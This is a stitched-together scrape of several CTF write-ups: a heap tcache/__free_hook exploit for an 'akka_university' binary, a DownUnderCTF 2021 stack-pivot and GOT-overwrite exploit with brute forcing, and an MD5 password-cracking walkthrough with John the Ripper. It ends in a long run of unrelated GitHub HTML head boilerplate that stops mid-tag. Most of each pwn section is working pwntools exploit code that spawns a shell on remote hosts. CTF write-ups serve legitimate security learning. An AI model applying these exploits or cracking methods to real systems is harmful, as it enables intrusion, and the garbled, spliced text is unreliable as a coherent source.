During sheet creation ,remarks entry in the sheet structure, is directly read from user input, by a read() function, and is not zero terminated. It is just before the record_ptr pointer, that points to our bloc allocated on heap.

second things to note (where the vulnerability lies):
In the edit function,

when you edit the sheet (called Re-evaluate a answer sheet in the menu),
the edit function check the length of remark with strlen, and use the size returned by strlen for the read() function that read input from the user.
That is very bad, because if during creation of sheet, we fill the remarks up to the end with 56 chars, the strlen will return the length of the remarks + the length of the record_ptr just after.

And then we can change the record_ptr with the following read() function.
and the last read() that edit the record, is read(0, record_ptr, record_size)
it is basically a read/write primitive for us.. we just have to create a sheet with 56 chars that fill the remarks entry, then to edit this sheet to modify record_ptr to points where we want to read or write, and to write what we want to this address while editing record entry..
With the "View the answer sheet" function from menu, we can also read from this address.
In the edit function above, the author of the challenge even include a check to see if record_ptr is less than 0x7effffffffff,
to forbid writing directly in libc with the write primitive.
Which would make the exploitation even more easy..
### **2: the Exploitation**
Ok, with our write/read primitive, exploitation is easy.
We will proceed like this.
first we create 4 sheets/bloc on heap
like this:

then we will free first the bloc 0, to put a heap address on heap (the bk pointer of the freed bloc)
We then edit the bloc1 heap pointer with the edit vulnerability, to make it points to the bk pointer of just freed bloc 0
We leak this address, with the show() function of menu.
Now we know where the heap is in memory.
now we are gonna to make a simple attack on tcache_perthread_struct, that is the first allocated bloc on heap, and where the tcache metadata are stored (number of tcache in each lists, previous freed bloc addres, etc)
for libc-2.31 it looks like this

the counts which are now coded on 16bit, record the number of blocs already in the tcache (a maximum of 7 normally).
And the entry record the address of the next bloc in a tcache (the one that will be given first)
So first we will use our write primitive to set tcache.counts to 7, for the 0x90 tcache blocs (our 0x88 blocs fall in this category)
So the malloc system will think this tcache is already full.
Next we free the bloc 2 (0x88 size), as his tcache is supposed to be full, it will be put in unsorted bins.
That will put two libc addresses in the freed bloc metada in his fd/bk pointers.
so now we edit bloc 1, and we use our read/write primitive, to read these libc address leaved in bk/fd, and calculate the libc base address.
now we edit again bloc 1, and use our read/write primitive to write the in the tcache_entry of bloc of size 0x20, we replace the next block address, by _free_hook address in libc (a bit before in fact)
then we allocate a bloc 0x18 size(fells in the 0x20 tcache), it will return us a bloc pointing to _free_hook
We write '/bin/sh' a bit before _free_hook, and the address of system() in _free_hook.
then immediatly we free this bloc, and a system('/bin/sh') will be called...
and that's all :)
see it in action:

Here is the exploit code commented:
```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *
context.update(arch="amd64", os="linux")context.log_level = 'info'
exe = ELF('./akka_university')libc = ELF('./libc.so.6')
host, port = "3.99.48.161", "9006"
if args.REMOTE: p = remote(host,port)else: p = process(exe.path)
def add(size, name, marks, remarks, log ): p.sendlineafter('>>','1') p.sendlineafter('record\n>>', str(size)) p.sendafter('name\n>>', name) # max size 0x14 (20) p.sendlineafter('marks\n>>', str(marks)) # int between 40 to 100 (dword) p.sendafter('Students\n>>', remarks) # max size 0x38 (56) p.sendafter('paper\n>>', log) # malloc bloc allocated size
def adda(size, data): add(size, 'A'*0x14, 40, 'B'*0x38, data)
def free(idx): p.sendlineafter('>>','2') p.sendlineafter('record\n>>', str(idx))
def show(idx): p.sendlineafter('>>','3') p.sendlineafter('view\n>>', str(idx))
def edit(idx, name, marks, remarks, log): p.sendlineafter('>>','4') p.sendlineafter('edit\n>>', str(idx)) p.sendlineafter('name\n>>', name) p.sendlineafter('marks\n>>', str(marks)) # int between 40 to 100 (dword) p.sendafter('Students\n>>', remarks) # max size 0x38 (56) p.sendafter('paper\n>>', log) # malloc bloc allocated size
adda(0x18, 'A') # bloc 0 --> no use we just free it to get a heap addressadda(0x18, 'B') # bloc 1 --> we will use this one, to write on the heap, via the edit function vulnerabilityadda(0x88, 'C') # bloc 2 --> this one will be freed to go in unsorted, and get a libc leakadda(0x38, 'D') # bloc 3 --> stop blocfree(0) # we free the first bloc, to put a heap address on heap for our leak
# modify heap address of bloc1 to point on freed bloc 0 bk pointeredit(1, 'A'*0x14, 40, 'a'*56+'\xa8', '\x10')show(1)p.recvuntil('contents\n', drop=True)leak1 = u64(p.recv(8))print('leak heap = '+hex(leak1))heap_base = leak1-0x10
# set 0x90 tcache->counts to 7 (full tcache)edit(1, 'A'*0x14, 40, b'a'*56+p16((leak1+14) & 0xffff), '\x07')
# as there is now 7 (non existing) blocs in tcache 0x90 list, freeing a 0x88 bloc , will go in unsortedfree(2)
# edit bloc 1 heap address, to make it point to bk/fd libc pointers leaved by freeing 0x88 blocedit(1, 'A'*0x14, 40, b'a'*56+p16((leak1+0x2d0) & 0xffff), '\xe0')
show(1)# get our libc leak & calculate libc basep.recvuntil('contents\n', drop=True)leak2 = u64(p.recv(8))print('leak libc = '+hex(leak2))libc.address = leak2 - 0x1ebbe0print('libc base = '+hex(libc.address))
# now modify head pointer of 0x20 blocs in tcache to points to __free_hook-16 (__free_hook-8 could works also but not in later libc, because of alignement)edit(1, '/bin/sh'.ljust(0x14,'\x00'), 40, b'a'*56+p16((leak1+0x80) & 0xffff), p64(libc.symbols['__free_hook']-16) )
# get an allocation near __free_hook, put '/bin/sh' string in the qword before __free_hook, and system address in __free_hookadda(0x18, b'/bin/sh'.ljust(16,b'\x00')+p64(libc.symbols['system'])) # bloc 4
# when free will be called on bloc 4 , system('/bin/sh') well be executedfree(4)
p.interactive()```
*nobodyisnobody still pwning things...* |

**"Ready, bounce, pwn"** was a pwn challenge from DownUnderCTF 2021.
A medium difficulty challenge.
A small program, a bit tricky, but not too much.
ok first we check the protections:

Got entries are writable, and NO PIE, that will be good for us..
Let's start the reversing..
**the main function first:**

**then the second function read_long()**

Basically the program ask for a name, and read it as an input of 0x18 bytes on stack.
then ask the user to enter a number with the read_long function,
and convert it to long int , with atol function.
The number is returned, in rax, and added to rbp before the program ends, as you can see at the end of main function.
So the trick, is to send a negative number, -32, like this rbp will point to our name given in input before on stack..
then ,when the program will reach leave / ret instructions at the end of main, stack will point to our name..
that leaves three ROP entries (0x18 bytes.. ) for our pivot... (we need only two in fact..)
when the instruction LEAVE execute, it will set rsp to rbp value, and first pop rbp register from new stack position.
so the trick is to set the new RBP, to points just before atol function GOT entry, at 0x404047...
and return back inside read_long function at 0x4011b1...
there it will read 0x13 bytes in the got entries..
we will set the two lsb bytes of atol GOT entry, to the address of system() function offset in libc (libc is given),
there will still be 4 bits of aslr to guess.. 1/16 chance to win !!
So with a little bruteforce, it will work...
just before the atol got entry, we put the string '/bin/sh', that will be given to atol (now system) as an argument.
it will do a system('/bin/sh') so....
and that's all.. :)
See it in action:

**The exploit code:**
```python3#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *
context.update(arch="amd64", os="linux")context.log_level = 'error'
host, port = "pwn-2021.duc.tf","31910"
# return inside read_long functiongadget1 = 0x4011b1''' 4011b1: 48 8d 45 e0 lea rax,[rbp-0x20] 4011b5: ba 13 00 00 00 mov edx,0x13 4011ba: 48 89 c6 mov rsi,rax 4011bd: bf 00 00 00 00 mov edi,0x0 4011c2: e8 89 fe ff ff call 401050 <read@plt> 4011c7: 48 8d 45 e0 lea rax,[rbp-0x20] 4011cb: 48 89 c7 mov rdi,rax 4011ce: e8 9d fe ff ff call 401070 <atol@plt> 4011d3: c9 leave 4011d4: c3 ret '''
count=0while (True): print(str(count)) count +=1 if args.LOCAL: p = process('./rbp') else: p = remote(host,port) payload = p64(0x404047)+p64(gadget1) p.sendafter('name? ',payload) p.sendafter('number? ','-32 '+'B'*15) p.send('/bin/sh'.ljust(0x11,'\x00')+'\x60\xda') p.sendline('id;') try: buff = p.recvuntil('uid', timeout=5) break except: p.close()
print(buff)p.sendline('cat flag*')
p.interactive()```
*nobodyisnobody still pwning things...* |
# Weak_password

1) ok, so from the question its clear we need to crack his hash and we are given a hint that the password contains his name and a date in they `YYYYMMDD` format. Quickly the steps to do this are: - identify the hash type - make a wordlist for all possible combinations of his name and date in the specified format - input it into John The Ripper and crack the hash
### Checking the hash type
1) go to [an online hash analyzer](https://www.tunnelsup.com/hash-analyzer/) and input the hash

- looks like it's MD5
### Making the wordlist
1) the wordlist must contains the dates in the `YYYYMMDD` format. I started from 1970 and went through 2021 for my range and generated it with my python script [dategen.py](dategen.py).
2) additionally i added an array of mangled versions of "aaron" - `echo "aaron" > aaron.txt` - `rsmangler --file aaron.txt --output mangled.txt` - `cat mangled.txt`

- i took most of the highlighted values and prepended/appended them to each date in my [dategen.py](dategen.py) script
3) run the script
```year= 1970
mangler = ["aaron","aaronaaron","noraa","Aaron","AARON","44r0n","4@r0n","@4r0n","@@r0n"]
with open("dates.txt", "w") as dates: while year < 2022: month = 1 while month < 13: day=1 while day < 32: daystr = f"{day:02d}" monstr = f"{month:02d}" yearstr = str(year) for i in mangler: dates.write(i+yearstr+monstr+daystr+"\n") dates.write(yearstr+monstr+daystr+i+"\n") day+=1 month +=1 year +=1```
### Crack the Hash
- `echo "7f4986da7d7b52fa81f98278e6ec9dcb" > hash.txt`- `john --wordlist=dates.txt --format=RAW-MD5 hash.txt`

- `flag{Aaron19800321}` i suppose the mangler wasn't necessary, but its still good practice |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" 